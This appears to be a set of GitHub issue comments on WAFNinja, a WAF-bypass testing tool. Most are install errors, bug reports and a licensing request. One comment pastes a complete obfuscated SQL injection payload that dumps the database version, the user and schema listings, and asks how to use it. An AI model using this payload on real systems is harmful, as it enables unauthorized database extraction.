In bypass mode the tool doesn't send payloads to application.
I checked the traffic and couldn't find payloads that appear in report.

As I try to run wafninja. Gives this error :
./wafninja.py: line 10: $'\r\n\r\n :Program: WAFNinja\r\n :ModuleName: wafninja\r\n :Version: 1.0\r\n :Revision: 1.0.0\r\n :Author: Khalil Bijjou\r\n :Description: The wafninja module is the main module, that controls the flow of the program. \r\n\r\n\r': command not found
./wafninja.py: line 11: $'\r': command not found
./wafninja.py: line 12: from: command not found
./wafninja.py: line 13: from: command not found
./wafninja.py: line 14: from: command not found
./wafninja.py: line 15: from: command not found
./wafninja.py: line 16: from: command not found
./wafninja.py: line 17: $'\r': command not found
./wafninja.py: line 18: syntax error near unexpected token (' '/wafninja.py: line 18: def setHeaders(cookie):

When I am running this command " pip install -r requirements.txt"
I am getting this error

Preparing metadata (setup.py) ... error
error: subprocess-exited-with-error

× python setup.py egg_info did not run successfully.
│ exit code: 1
╰─> [11 lines of output]
Traceback (most recent call last):
File "", line 2, in
File "", line 34, in
File "/tmp/pip-install-ky1b5bhf/progressbar_ed6ad989a17044afbd330d3418000238/setup.py", line 5, in
import progressbar
File "/tmp/pip-install-ky1b5bhf/progressbar_ed6ad989a17044afbd330d3418000238/progressbar/init.py", line 59, in
from progressbar.widgets import *
File "/tmp/pip-install-ky1b5bhf/progressbar_ed6ad989a17044afbd330d3418000238/progressbar/widgets.py", line 121, in
class FileTransferSpeed(Widget):
File "", line 106, in new
ValueError: 'format' in slots conflicts with class variable
[end of output]

note: This error originates from a subprocess, and is likely not a problem with pip.
error: metadata-generation-failed

× Encountered error while generating package metadata.
╰─> See above for output.

note: This is an issue with the package mentioned above, not pip.
hint: See above for details.

Traceback (most recent call last):
File "wafninja.py", line 15, in
from ninja.bypass import firePayload
File "/Users/mac/Desktop/WAFNinja-master/ninja/bypass.py", line 16, in
from prettytable import PrettyTable
ImportError: No module named prettytable
macdeMacBook-Pro:WAFNinja-master mac$ python wafninja.py
Traceback (most recent call last):
File "wafninja.py", line 15, in
from ninja.bypass import firePayload
File "/Users/mac/Desktop/WAFNinja-master/ninja/bypass.py", line 16, in
from prettytable import PrettyTable

Using python or python3, I get this:

File "/home/kalimatrix/WAFNinja/wafninja.py", line 84
print "Database sucessfully changed!"
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?

..

Please help! Thanks!

/!00000concat/(0x63726561746f723a2064705f6d6d78,0x3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d353e44622056657273696f6e203a20,version(),0x3c62723e44622055736572203a20,user(),0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(select%20(@x)%20/!00000from/%20(select%20(@x:=0x00),(select%20(0)%20/!00000from/%20(information_schema/**/.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20(@x:=/!00000concat/(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x))

These are the responses I get when I run this WAFNinja against a test web server root. My question is how to use these payloads? Now, I know that question makes me sound pretty ignorant about SQL. I am working my way from sqlmap to SQL...Hence, the lack of knowledge. If you could answer this and point me somewhere where I can read more about this..I would be thankful. Regards

          Fuzz Scanning Starting                       ║

╚════════════════════════════════════════════════════════════════╝
starting fuzzing with waf ninja

___       ______________________   ______       ________        
__ |     / /__    |__  ____/__  | / /__(_)____________(_)_____ _
__ | /| / /__  /| |_  /_   __   |/ /__  /__  __ \____  /_  __ `/
__ |/ |/ / _  ___ |  __/   _  /|  / _  / _  / / /___  / / /_/ / 
____/|__/  /_/  |_/_/      /_/ |_/  /_/  /_/ /_/___  /  \__,_/  
                                                /___/           
                                                
WAFNinja - Penetration testers favorite for WAF Bypassing

Traceback (most recent call last):################################# |
File "wafninja.py", line 67, in
fireFuzz(type, fuzz, url, post, header, delay, outputFile, proxy, prefix, postfix)
File "/home/user/Desktop/Yuki-Chan-The-Auto-Pentest/Module/WAFNinja/ninja/fuzzer.py", line 89, in fireFuzz
response = opener.open(url_with_fuzz)
File "/usr/lib/python2.7/urllib2.py", line 429, in open
response = self._open(req, data)
File "/usr/lib/python2.7/urllib2.py", line 447, in _open
'_open', req)
File "/usr/lib/python2.7/urllib2.py", line 407, in _call_chain
result = func(*args)
File "/usr/lib/python2.7/urllib2.py", line 1228, in http_open
return self.do_open(httplib.HTTPConnection, req)
File "/usr/lib/python2.7/urllib2.py", line 1198, in do_open
raise URLError(err)
urllib2.URLError: <urlopen error [Errno -2] Name or service not known>
fuzzing finished

Hello,

I want to add your tool into ArchStrike however your tool doesn't have a license file.

Is it possible for you to add one?

Hi, I get this error when I try to install the requirements.

Command "python setup.py egg_info" failed with error code 1 in /tmp/pip-build-5a0oxpj5/progressbar/

I hope this would get fix soon. Thanks.

Hello,

When my web application reply with a 404 error, the tool stops with the error "Target URL not reachable!".

Regards,

gpillot

My report all shows working:"yes". I suppose it's because the WAF sends a code 200 (a page saying the request was blocked). So maybe parsing the response to check if it's a message from the WAF would be a good idea (:

Hey
This the command i am trying to process

──(kali㉿kali)-[~/Desktop/WAFNinja]
└─$ python wafninja.py --help
Traceback (most recent call last):
File "wafninja.py", line 15, in
from ninja.bypass import firePayload
File "/home/kali/Desktop/WAFNinja/ninja/bypass.py", line 16, in
from prettytable import PrettyTable
ImportError: No module named prettytable

i tried doing pip install prettytable and progressbar but none of them working pls someone help what this module thing is?and also someone pls help me on how to import prettytable

WAFNinja has been inventoried on Rawsec's CyberSecurity Inventory.

https://inventory.rawsec.ml/tools.html#WAFNinja

What is Rawsec's CyberSecurity Inventory?

An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.

More details about features here.

Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.

Why should you care about being inventoried?

Mainly because this is giving visibility to your tool and improve its referencing.

Badges

The badge shows to your community that your are inventoried. It looks good but also shows you care about your project, that your tool is referenced.

Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges, it looks like that , but there are several styles available.

Want to thank us?

If you want to thank us, you can help make our open project better known by tweeting about it! For example:

So what?

That's all, this message is just to notify you if you care. Else you can close this issue.